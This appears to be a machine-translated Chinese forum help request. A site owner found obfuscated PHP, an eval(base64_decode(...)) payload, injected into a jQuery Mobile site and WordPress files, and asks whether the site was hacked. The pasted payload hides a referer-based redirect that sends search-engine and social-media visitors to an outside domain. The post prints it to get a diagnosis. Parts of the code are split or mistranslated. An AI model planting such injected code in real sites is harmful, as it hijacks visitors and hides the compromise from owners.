最近我注意到一个 jquery mobile - 创建的 php 网站没有加载。当我检查相关的 php 文件时,我可以看到一些额外的字符进入了代码中。标记后不久,多余的字符就出现了<?php
。原因是什么?我的网站被黑了吗?我将如何恢复我的所有文件?这些文件正在通过控制面板登录访问。我什至可以看到网站文件夹之外的文件,一些 wp 文件(wp-config.php、wp-blog-header.php 等)也包含这些额外的字符。
这是发现的恶意代码 -<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVI
有大佬,求指教。
这是完整的代码
评估(base64_decode(“/KVwmbHJcPS8iLCryZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vcGtqbGFwb2suMWR1bWIuY29tLyIpOw0KZXhpdCgpOw0KfQp9Cn0NCn0NCn0="));